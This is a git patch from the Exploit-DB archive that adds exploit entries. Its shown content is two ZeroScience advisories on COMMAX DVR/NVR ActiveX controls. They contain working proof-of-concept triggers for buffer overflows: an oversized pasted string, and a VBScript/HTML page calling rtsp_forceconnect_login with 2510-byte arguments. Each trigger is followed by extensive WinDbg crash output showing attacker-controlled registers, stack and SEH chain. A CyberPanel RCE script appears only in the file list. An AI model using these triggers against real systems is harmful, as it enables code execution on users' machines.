From ac4322c402cdd33966a45ed97667c4b537cabe6c Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 28 Aug 2021 05:01:59 +0000
Subject: [PATCH] DB: 2021-08-28

3 changes to exploits/shellcodes

CyberPanel 2.1 - Remote Code Execution (RCE) (Authenticated)
COMMAX WebViewer ActiveX Control 2.1.4.5 - 'Commax_WebViewer.ocx' Buffer Overflow
COMMAX UMS Client ActiveX Control 1.7.0.2 - 'CNC_Ctrl.dll' Heap Buffer Overflow
---
 exploits/hardware/webapps/50231.txt | 332 +++++++++++++++++
 exploits/hardware/webapps/50232.txt | 551 ++++++++++++++++++++++++++++
 exploits/multiple/webapps/50230.py  | 203 ++++++++++
 files_exploits.csv                  |   3 +
 4 files changed, 1089 insertions(+)
 create mode 100644 exploits/hardware/webapps/50231.txt
 create mode 100644 exploits/hardware/webapps/50232.txt
 create mode 100755 exploits/multiple/webapps/50230.py

diff --git a/exploits/hardware/webapps/50231.txt b/exploits/hardware/webapps/50231.txt
new file mode 100644
index 000000000..90e50c4c7
--- /dev/null
+++ b/exploits/hardware/webapps/50231.txt
@@ -0,0 +1,332 @@
+# Exploit Title: COMMAX WebViewer ActiveX Control 2.1.4.5 - 'Commax_WebViewer.ocx' Buffer Overflow
+# Date: 02.08.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.commax.com
+
+COMMAX WebViewer ActiveX Control 2.1.4.5 (Commax_WebViewer.ocx) Buffer Overflow
+
+
+Vendor: COMMAX Co., Ltd.
+Prodcut web page: https://www.commax.com
+Affected version: 2.1.4.5
+
+Summary: COMMAX activex web viewer client (32bit) for COMMAX DVR/NVR.
+
+Desc: The vulnerability is caused due to a boundary error in the
+processing of user input, which can be exploited to cause a buffer
+overflow when a user inserts overly long array of string bytes
+through several functions. Successful exploitation could allow
+execution of arbitrary code on the affected node.
+
+Tested on: Microsoft Windows 10 Home (64bit) EN
+           Microsoft Internet Explorer 20H2
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2021-5663
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5663.php
+
+
+02.08.2021
+
+--
+
+
+$ python
+>>> "A"*1000 [ToTheClipboard]
+>>>#Paste in ID or anywhere
+
+(5220.5b30): Access violation - code c0000005 (!!! second chance !!!)
+wow64!Wow64pNotifyDebugger+0x19918:
+00007ff9`deb0b530 c644242001      mov     byte ptr [rsp+20h],1 ss:00000000`0c47de00=00
+0:038> g
+(5220.5b30): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for CNC_Ctrl.DLL - 
+CNC_Ctrl!DllUnregisterServer+0xf5501:
+0b4d43bf f3aa            rep stos byte ptr es:[edi]
+0:038:x86> r
+eax=00000000 ebx=00002000 ecx=0000000f edx=00000000 esi=41414141 edi=41414141
+eip=0b4d43bf esp=0d78f920 ebp=0d78f930 iopl=0         nv up ei pl zr na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
+CNC_Ctrl!DllUnregisterServer+0xf5501:
+0b4d43bf f3aa            rep stos byte ptr es:[edi]
+0:038:x86> !exchain
+0d78fac4: CNC_Ctrl!DllUnregisterServer+eca92 (0b4cb950)
+0d78fb74: ntdll_76f80000!_except_handler4+0 (76ffad20)
+  CRT scope  0, filter: ntdll_76f80000!__RtlUserThreadStart+3cdb7 (77024806)
+                func:   ntdll_76f80000!__RtlUserThreadStart+3ce50 (7702489f)
+0d78fb8c: ntdll_76f80000!FinalExceptionHandlerPad25+0 (77008a29)
+Invalid exception stack at ffffffff
+0:038:x86> kb
+ # ChildEBP RetAddr  Args to Child              
+WARNING: Stack unwind information not available. Following frames may be wrong.
+00 0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501
+01 0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c
+02 0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67
+03 0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7
+0:038:x86> d esp
+0d78f920  0f 00 00 00 00 00 00 00-dc 2e ff 76 78 c5 7e 0b  ...........vx.~.
+0d78f930  b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00  ..~..]@.AAAA....
+0d78f940  00 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00  . ......x.~.....
+0d78f950  10 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00  .^.u%.@...x. ...
+0d78f960  00 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00  .i.a..x.........
+0d78f970  10 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76  ..........x.W(.v
+0d78f980  70 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76  p:...........(.v
+0d78f990  00 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00  ............t...
+0:038:x86> d ebp
+0d78f930  b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00  ..~..]@.AAAA....
+0d78f940  00 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00  . ......x.~.....
+0d78f950  10 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00  .^.u%.@...x. ...
+0d78f960  00 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00  .i.a..x.........
+0d78f970  10 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76  ..........x.W(.v
+0d78f980  70 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76  p:...........(.v
+0d78f990  00 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00  ............t...
+0d78f9a0  8c 0c 00 00 88 0e 00 00-8c 0e 00 00 b8 0d 00 00  ................
+0:038:x86> d esi
+41414141  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+41414151  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+41414161  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+41414171  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+41414181  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+41414191  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+414141a1  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+414141b1  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+0:038:x86> !analyze -v
+*******************************************************************************
+*                                                                             *
+*                        Exception Analysis                                   *
+*                                                                             *
+*******************************************************************************
+
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ie_to_edge_bho.dll - 
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for Commax_WebViewer.OCX - 
+GetUrlPageData2 (WinHttp) failed: 12002.
+
+DUMP_CLASS: 2
+
+DUMP_QUALIFIER: 0
+
+FAULTING_IP: 
+CNC_Ctrl!DllUnregisterServer+f5501
+0b4d43bf f3aa            rep stos byte ptr es:[edi]
+
+EXCEPTION_RECORD:  (.exr -1)
+ExceptionAddress: 0b4d43bf (CNC_Ctrl!DllUnregisterServer+0x000f5501)
+   ExceptionCode: c0000005 (Access violation)
+  ExceptionFlags: 00000000
+NumberParameters: 2
+   Parameter[0]: 00000001
+   Parameter[1]: 41414141
+Attempt to write to address 41414141
+
+FAULTING_THREAD:  00005b30
+
+DEFAULT_BUCKET_ID:  INVALID_POINTER_WRITE
+
+PROCESS_NAME:  IEXPLORE.EXE
+
+ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
+
+EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
+
+EXCEPTION_CODE_STR:  c0000005
+
+EXCEPTION_PARAMETER1:  00000001
+
+EXCEPTION_PARAMETER2:  41414141
+
+FOLLOWUP_IP: 
+CNC_Ctrl!DllUnregisterServer+f5501
+0b4d43bf f3aa            rep stos byte ptr es:[edi]
+
+WRITE_ADDRESS:  41414141 
+
+WATSON_BKT_PROCSTAMP:  95286d96
+
+WATSON_BKT_PROCVER:  11.0.19041.1
+
+PROCESS_VER_PRODUCT:  Internet Explorer
+
+WATSON_BKT_MODULE:  CNC_Ctrl.DLL
+
+WATSON_BKT_MODSTAMP:  547ed821
+
+WATSON_BKT_MODOFFSET:  1043bf
+
+WATSON_BKT_MODVER:  1.7.0.2
+
+MODULE_VER_PRODUCT:  CNC_Ctrl Module
+
+BUILD_VERSION_STRING:  10.0.19041.1023 (WinBuild.160101.0800)
+
+MODLIST_WITH_TSCHKSUM_HASH:  aadfa1c5bdd8f77b979f6a5b222994db450b715e
+
+MODLIST_SHA1_HASH:  849cfdbdcb18d5749dc41f313fc544a643772db9
+
+NTGLOBALFLAG:  0
+
+PROCESS_BAM_CURRENT_THROTTLED: 0
+
+PROCESS_BAM_PREVIOUS_THROTTLED: 0
+
+APPLICATION_VERIFIER_FLAGS:  0
+
+PRODUCT_TYPE:  1
+
+SUITE_MASK:  784
+
+DUMP_TYPE:  fe
+
+ANALYSIS_SESSION_HOST:  LAB17
+
+ANALYSIS_SESSION_TIME:  08-12-2021 14:20:11.0116
+
+ANALYSIS_VERSION: 10.0.16299.91 amd64fre
+
+THREAD_ATTRIBUTES: 
+OS_LOCALE:  ENU
+
+PROBLEM_CLASSES: 
+
+    ID:     [0n301]
+    Type:   [@ACCESS_VIOLATION]
+    Class:  Addendum
+    Scope:  BUCKET_ID
+    Name:   Omit
+    Data:   Omit
+    PID:    [Unspecified]
+    TID:    [0x5b30]
+    Frame:  [0] : CNC_Ctrl!DllUnregisterServer
+
+    ID:     [0n274]
+    Type:   [INVALID_POINTER_WRITE]
+    Class:  Primary
+    Scope:  DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
+            BUCKET_ID
+    Name:   Add
+    Data:   Omit
+    PID:    [Unspecified]
+    TID:    [0x5b30]
+    Frame:  [0] : CNC_Ctrl!DllUnregisterServer
+
+    ID:     [0n152]
+    Type:   [ZEROED_STACK]
+    Class:  Addendum
+    Scope:  BUCKET_ID
+    Name:   Add
+    Data:   Omit
+    PID:    [0x5220]
+    TID:    [0x5b30]
+    Frame:  [0] : CNC_Ctrl!DllUnregisterServer
+
+BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK
+
+PRIMARY_PROBLEM_CLASS:  APPLICATION_FAULT
+
+LAST_CONTROL_TRANSFER:  from 0b405dea to 0b4d43bf
+
+STACK_TEXT:  
+WARNING: Stack unwind information not available. Following frames may be wrong.
+0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501
+0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c
+0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67
+0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7
+
+
+THREAD_SHA1_HASH_MOD_FUNC:  e84e62df4095d241971250198ae18de0797cfdc7
+
+THREAD_SHA1_HASH_MOD_FUNC_OFFSET:  2033316a7c1a92aaeab1ce97e013350953fef546
+
+THREAD_SHA1_HASH_MOD:  6d850af928076b326edbcafdf6dd4f771aafbab5
+
+FAULT_INSTR_CODE:  458baaf3
+
+SYMBOL_STACK_INDEX:  0
+
+SYMBOL_NAME:  CNC_Ctrl!DllUnregisterServer+f5501
+
+FOLLOWUP_NAME:  MachineOwner
+
+MODULE_NAME: CNC_Ctrl
+
+IMAGE_NAME:  CNC_Ctrl.DLL
+
+DEBUG_FLR_IMAGE_TIMESTAMP:  547ed821
+
+STACK_COMMAND:  ~38s ; .cxr ; kb
+
+FAILURE_BUCKET_ID:  INVALID_POINTER_WRITE_c0000005_CNC_Ctrl.DLL!DllUnregisterServer
+
+BUCKET_ID:  APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_CNC_Ctrl!DllUnregisterServer+f5501
+
+FAILURE_EXCEPTION_CODE:  c0000005
+
+FAILURE_IMAGE_NAME:  CNC_Ctrl.DLL
+
+BUCKET_ID_IMAGE_STR:  CNC_Ctrl.DLL
+
+FAILURE_MODULE_NAME:  CNC_Ctrl
+
+BUCKET_ID_MODULE_STR:  CNC_Ctrl
+
+FAILURE_FUNCTION_NAME:  DllUnregisterServer
+
+BUCKET_ID_FUNCTION_STR:  DllUnregisterServer
+
+BUCKET_ID_OFFSET:  f5501
+
+BUCKET_ID_MODTIMEDATESTAMP:  547ed821
+
+BUCKET_ID_MODCHECKSUM:  357a4b
+
+BUCKET_ID_MODVER_STR:  1.7.0.2
+
+BUCKET_ID_PREFIX_STR:  APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_
+
+FAILURE_PROBLEM_CLASS:  APPLICATION_FAULT
+
+FAILURE_SYMBOL_NAME:  CNC_Ctrl.DLL!DllUnregisterServer
+
+WATSON_STAGEONE_URL:  http://watson.microsoft.com/StageOne/IEXPLORE.EXE/11.0.19041.1/95286d96/CNC_Ctrl.DLL/1.7.0.2/547ed821/c0000005/001043bf.htm?Retriage=1
+
+TARGET_TIME:  2021-08-12T12:21:50.000Z
+
+OSBUILD:  19042
+
+OSSERVICEPACK:  1023
+
+SERVICEPACK_NUMBER: 0
+
+OS_REVISION: 0
+
+OSPLATFORM_TYPE:  x64
+
+OSNAME:  Windows 10
+
+OSEDITION:  Windows 10 WinNt SingleUserTS Personal
+
+USER_LCID:  0
+
+OSBUILD_TIMESTAMP:  unknown_date
+
+BUILDDATESTAMP_STR:  160101.0800
+
+BUILDLAB_STR:  WinBuild
+
+BUILDOSVER_STR:  10.0.19041.1023
+
+ANALYSIS_SESSION_ELAPSED_TIME:  1d869
+
+ANALYSIS_SOURCE:  UM
+
+FAILURE_ID_HASH_STRING:  um:invalid_pointer_write_c0000005_cnc_ctrl.dll!dllunregisterserver
+
+FAILURE_ID_HASH:  {5e1e375a-c411-e928-cd64-b7f6c07eea3b}
+
+Followup:     MachineOwner
+---------
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50232.txt b/exploits/hardware/webapps/50232.txt
new file mode 100644
index 000000000..de6ee4b5a
--- /dev/null
+++ b/exploits/hardware/webapps/50232.txt
@@ -0,0 +1,551 @@
+# Exploit Title: COMMAX UMS Client ActiveX Control 1.7.0.2 - 'CNC_Ctrl.dll' Heap Buffer Overflow
+# Date: 02.08.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.commax.com
+
+COMMAX UMS Client ActiveX Control 1.7.0.2 (CNC_Ctrl.dll) Heap Buffer Overflow
+
+
+Vendor: COMMAX Co., Ltd.
+Prodcut web page: https://www.commax.com
+Affected version: 1.7.0.2
+
+Summary: COMMAX activex web viewer UMS client (32bit) for COMMAX
+DVR/NVR.
+
+Desc: The vulnerability is caused due to a boundary error in the
+processing of user input, which can be exploited to cause a heap
+based buffer overflow when a user inserts overly long array of
+string bytes through several functions. Successful exploitation
+could allow execution of arbitrary code on the affected node.
+
+Tested on: Microsoft Windows 10 Home (64bit) EN
+           Microsoft Internet Explorer 20H2
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2021-5664
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5664.php
+
+
+02.08.2021
+
+--
+
+
+<!-- functions: rtsp_forceconnect_login() and rtsp_connect_login() -->
+<!-- parameters: user_id, user_pwd and rtsp_addr                   -->
+<html>
+<object classid='clsid:3D6F2DBA-F4E5-40A6-8725-E99BC96CC23A' id='cel' />
+<script language='vbscript'>
+targetFile = "C:\Windows\Downloaded Program Files\CNC_CTRL.dll"
+prototype  = "Function rtsp_forceconnect_login ( ByVal user_id As String ,  ByVal user_pwd As String ,  ByVal rtsp_addr As String ,  ByVal rtsp_port As Long ,  ByVal rtp_proto As Long ,  ByVal device As Long ,  ByVal islive As Long ,  ByVal ch As Long ) As Long"
+memberName = "rtsp_forceconnect_login"
+progid     = "CNC_CTRLLib.UMS_Ctrl"
+argCount   = 8
+
+arga=String(2510, "C")
+argb=String(2510, "B")
+argc=String(2510, "A")
+argd=1
+arge=1
+argf=1
+argg=1
+argh=1
+
+cel.rtsp_forceconnect_login arga ,argb ,argc ,argd ,arge ,argf ,argg ,argh 
+
+</script>
+</html>
+
+==
+
+(5b1c.59e8): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for CNC_Ctrl.DLL - 
+CNC_Ctrl!DllUnregisterServer+0x19e34:
+10028cf2 83a1d412000000  and     dword ptr [ecx+12D4h],0 ds:002b:000012d4=????????
+0:000:x86> r
+eax=00000001 ebx=10119db8 ecx=00000000 edx=81ff6f2e esi=058c0048 edi=00000001
+eip=10028cf2 esp=030fcf10 ebp=030fe33c iopl=0         nv up ei pl nz na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
+CNC_Ctrl!DllUnregisterServer+0x19e34:
+10028cf2 83a1d412000000  and     dword ptr [ecx+12D4h],0 ds:002b:000012d4=????????
+0:000:x86> !exchain
+030feab4: 41414141
+Invalid exception stack at 41414141
+0:000:x86> d esp
+030fcf10  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+030fcf20  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+030fcf30  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+030fcf40  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+030fcf50  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+030fcf60  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+030fcf70  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+030fcf80  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+0:000:x86> d ebp
+030fe33c  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
+030fe34c  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
+030fe35c  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
+030fe36c  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
+030fe37c  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
+030fe38c  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
+030fe39c  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
+030fe3ac  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
+0:000:x86> !analyze -v
+*******************************************************************************
+*                                                                             *
+*                        Exception Analysis                                   *
+*                                                                             *
+*******************************************************************************
+
+GetUrlPageData2 (WinHttp) failed: 12002.
+
+DUMP_CLASS: 2
+
+DUMP_QUALIFIER: 0
+
+FAULTING_IP: 
+CNC_Ctrl!DllUnregisterServer+18ee3
+10027da1 8999d4120000    mov     dword ptr [ecx+12D4h],ebx
+
+EXCEPTION_RECORD:  (.exr -1)
+ExceptionAddress: 10027da1 (CNC_Ctrl!DllUnregisterServer+0x00018ee3)
+   ExceptionCode: c0000005 (Access violation)
+  ExceptionFlags: 00000000
+NumberParameters: 2
+   Parameter[0]: 00000001
+   Parameter[1]: 000012d4
+Attempt to write to address 000012d4
+
+FAULTING_THREAD:  000056a4
+
+DEFAULT_BUCKET_ID:  INVALID_POINTER_WRITE
+
+PROCESS_NAME:  wscript.exe
+
+ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
+
+EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
+
+EXCEPTION_CODE_STR:  c0000005
+
+EXCEPTION_PARAMETER1:  00000001
+
+EXCEPTION_PARAMETER2:  000012d4
+
+FOLLOWUP_IP: 
+CNC_Ctrl!DllUnregisterServer+18ee3
+10027da1 8999d4120000    mov     dword ptr [ecx+12D4h],ebx
+
+WRITE_ADDRESS:  000012d4 
+
+WATSON_BKT_PROCSTAMP:  7159f3df
+
+WATSON_BKT_PROCVER:  5.812.10240.16384
+
+PROCESS_VER_PRODUCT:  Microsoft ® Windows Script Host
+
+WATSON_BKT_MODULE:  CNC_Ctrl.DLL
+
+WATSON_BKT_MODSTAMP:  547ed821
+
+WATSON_BKT_MODOFFSET:  27da1
+
+WATSON_BKT_MODVER:  1.7.0.2
+
+MODULE_VER_PRODUCT:  CNC_Ctrl Module
+
+BUILD_VERSION_STRING:  10.0.19041.1023 (WinBuild.160101.0800)
+
+MODLIST_WITH_TSCHKSUM_HASH:  d459299c6b0ff5b482d41c6445b84a3447c0171e
+
+MODLIST_SHA1_HASH:  18e8e8c8cdd4f9db5369e6ca934fd1b74bcb19c1
+
+NTGLOBALFLAG:  0
+
+PROCESS_BAM_CURRENT_THROTTLED: 0
+
+PROCESS_BAM_PREVIOUS_THROTTLED: 0
+
+APPLICATION_VERIFIER_FLAGS:  0
+
+PRODUCT_TYPE:  1
+
+SUITE_MASK:  784
+
+DUMP_TYPE:  fe
+
+ANALYSIS_SESSION_HOST:  LAB17
+
+ANALYSIS_SESSION_TIME:  08-12-2021 13:37:16.0907
+
+ANALYSIS_VERSION: 10.0.16299.91 amd64fre
+
+THREAD_ATTRIBUTES: 
+OS_LOCALE:  ENU
+
+PROBLEM_CLASSES: 
+
+    ID:     [0n301]
+    Type:   [@ACCESS_VIOLATION]
+    Class:  Addendum
+    Scope:  BUCKET_ID
+    Name:   Omit
+    Data:   Omit
+    PID:    [Unspecified]
+    TID:    [0x56a4]
+    Frame:  [0] : CNC_Ctrl!DllUnregisterServer
+
+    ID:     [0n274]
+    Type:   [INVALID_POINTER_WRITE]
+    Class:  Primary
+    Scope:  DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
+            BUCKET_ID
+    Name:   Add
+    Data:   Omit
+    PID:    [Unspecified]
+    TID:    [0x56a4]
+    Frame:  [0] : CNC_Ctrl!DllUnregisterServer
+
+    ID:     [0n152]
+    Type:   [ZEROED_STACK]
+    Class:  Addendum
+    Scope:  BUCKET_ID
+    Name:   Add
+    Data:   Omit
+    PID:    [0x56e4]
+    TID:    [0x56a4]
+    Frame:  [0] : CNC_Ctrl!DllUnregisterServer
+
+BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK
+
+PRIMARY_PROBLEM_CLASS:  APPLICATION_FAULT
+
+IP_ON_HEAP:  61616161
+The fault address in not in any loaded module, please check your build's rebase
+log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
+contain the address if it were loaded.
+
+IP_IN_FREE_BLOCK: 61616161
+
+FRAME_ONE_INVALID: 1
+
+LAST_CONTROL_TRANSFER:  from 61616161 to 10027da1
+
+STACK_TEXT:  
+WARNING: Stack unwind information not available. Following frames may be wrong.
+00afe294 61616161 61616161 61616161 61616161 CNC_Ctrl!DllUnregisterServer+0x18ee3
+00afe298 61616161 61616161 61616161 61616161 0x61616161
+00afe29c 61616161 61616161 61616161 61616161 0x61616161
+00afe2a0 61616161 61616161 61616161 61616161 0x61616161
+00afe2a4 61616161 61616161 61616161 61616161 0x61616161
+00afe2a8 61616161 61616161 61616161 61616161 0x61616161
+00afe2ac 61616161 61616161 61616161 61616161 0x61616161
+00afe2b0 61616161 61616161 61616161 61616161 0x61616161
+00afe2b4 61616161 61616161 61616161 61616161 0x61616161
+00afe2b8 61616161 61616161 61616161 61616161 0x61616161
+00afe2bc 61616161 61616161 61616161 61616161 0x61616161
+00afe2c0 61616161 61616161 61616161 61616161 0x61616161
+00afe2c4 61616161 61616161 61616161 61616161 0x61616161
+00afe2c8 61616161 61616161 61616161 61616161 0x61616161
+00afe2cc 61616161 61616161 61616161 61616161 0x61616161
+00afe2d0 61616161 61616161 61616161 61616161 0x61616161
+00afe2d4 61616161 61616161 61616161 61616161 0x61616161
+00afe2d8 61616161 61616161 61616161 61616161 0x61616161
+00afe2dc 61616161 61616161 61616161 61616161 0x61616161
+00afe2e0 61616161 61616161 61616161 61616161 0x61616161
+00afe2e4 61616161 61616161 61616161 61616161 0x61616161
+00afe2e8 61616161 61616161 61616161 61616161 0x61616161
+00afe2ec 61616161 61616161 61616161 61616161 0x61616161
+00afe2f0 61616161 61616161 61616161 61616161 0x61616161
+00afe2f4 61616161 61616161 61616161 61616161 0x61616161
+00afe2f8 61616161 61616161 61616161 61616161 0x61616161
+00afe2fc 61616161 61616161 61616161 61616161 0x61616161
+00afe300 61616161 61616161 61616161 61616161 0x61616161
+00afe304 61616161 61616161 61616161 61616161 0x61616161
+00afe308 61616161 61616161 61616161 61616161 0x61616161
+00afe30c 61616161 61616161 61616161 61616161 0x61616161
+00afe310 61616161 61616161 61616161 61616161 0x61616161
+00afe314 61616161 61616161 61616161 61616161 0x61616161
+00afe318 61616161 61616161 61616161 41414141 0x61616161
+00afe31c 61616161 61616161 41414141 41414141 0x61616161
+00afe320 61616161 41414141 41414141 41414141 0x61616161
+00afe324 41414141 41414141 41414141 41414141 0x61616161
+00afe328 41414141 41414141 41414141 41414141 0x41414141
+00afe32c 41414141 41414141 41414141 41414141 0x41414141
+00afe330 41414141 41414141 41414141 41414141 0x41414141
+00afe334 41414141 41414141 41414141 41414141 0x41414141
+00afe338 41414141 41414141 41414141 41414141 0x41414141
+00afe33c 41414141 41414141 41414141 41414141 0x41414141
+00afe340 41414141 41414141 41414141 41414141 0x41414141
+00afe344 41414141 41414141 41414141 41414141 0x41414141
+00afe348 41414141 41414141 41414141 41414141 0x41414141
+00afe34c 41414141 41414141 41414141 41414141 0x41414141
+00afe350 41414141 41414141 41414141 41414141 0x41414141
+00afe354 41414141 41414141 41414141 41414141 0x41414141
+00afe358 41414141 41414141 41414141 41414141 0x41414141
+00afe35c 41414141 41414141 41414141 41414141 0x41414141
+00afe360 41414141 41414141 41414141 41414141 0x41414141
+00afe364 41414141 41414141 41414141 41414141 0x41414141
+00afe368 41414141 41414141 41414141 41414141 0x41414141
+00afe36c 41414141 41414141 41414141 41414141 0x41414141
+00afe370 41414141 41414141 41414141 41414141 0x41414141
+00afe374 41414141 41414141 41414141 41414141 0x41414141
+00afe378 41414141 41414141 41414141 41414141 0x41414141
+00afe37c 41414141 41414141 41414141 41414141 0x41414141
+00afe380 41414141 41414141 41414141 41414141 0x41414141
+00afe384 41414141 41414141 41414141 41414141 0x41414141
+00afe388 41414141 41414141 41414141 41414141 0x41414141
+00afe38c 41414141 41414141 41414141 41414141 0x41414141
+00afe390 41414141 41414141 41414141 41414141 0x41414141
+00afe394 41414141 41414141 41414141 41414141 0x41414141
+00afe398 41414141 41414141 41414141 41414141 0x41414141
+00afe39c 41414141 41414141 41414141 41414141 0x41414141
+00afe3a0 41414141 41414141 41414141 41414141 0x41414141
+00afe3a4 41414141 41414141 41414141 41414141 0x41414141
+00afe3a8 41414141 41414141 41414141 41414141 0x41414141
+00afe3ac 41414141 41414141 41414141 41414141 0x41414141
+00afe3b0 41414141 41414141 41414141 41414141 0x41414141
+00afe3b4 41414141 41414141 41414141 41414141 0x41414141
+00afe3b8 41414141 41414141 41414141 41414141 0x41414141
+00afe3bc 41414141 41414141 41414141 41414141 0x41414141
+00afe3c0 41414141 41414141 41414141 41414141 0x41414141
+00afe3c4 41414141 41414141 41414141 41414141 0x41414141
+00afe3c8 41414141 41414141 41414141 41414141 0x41414141
+00afe3cc 41414141 41414141 41414141 41414141 0x41414141
+00afe3d0 41414141 41414141 41414141 41414141 0x41414141
+00afe3d4 41414141 41414141 41414141 41414141 0x41414141
+00afe3d8 41414141 41414141 41414141 41414141 0x41414141
+00afe3dc 41414141 41414141 41414141 41414141 0x41414141
+00afe3e0 41414141 41414141 41414141 41414141 0x41414141
+00afe3e4 41414141 41414141 41414141 41414141 0x41414141
+00afe3e8 41414141 41414141 41414141 41414141 0x41414141
+00afe3ec 41414141 41414141 41414141 41414141 0x41414141
+00afe3f0 41414141 41414141 41414141 41414141 0x41414141
+00afe3f4 41414141 41414141 41414141 41414141 0x41414141
+00afe3f8 41414141 41414141 41414141 41414141 0x41414141
+00afe3fc 41414141 41414141 41414141 41414141 0x41414141
+00afe400 41414141 41414141 41414141 41414141 0x41414141
+00afe404 41414141 41414141 41414141 41414141 0x41414141
+00afe408 41414141 41414141 41414141 41414141 0x41414141
+00afe40c 41414141 41414141 41414141 41414141 0x41414141
+00afe410 41414141 41414141 41414141 41414141 0x41414141
+00afe414 41414141 41414141 41414141 41414141 0x41414141
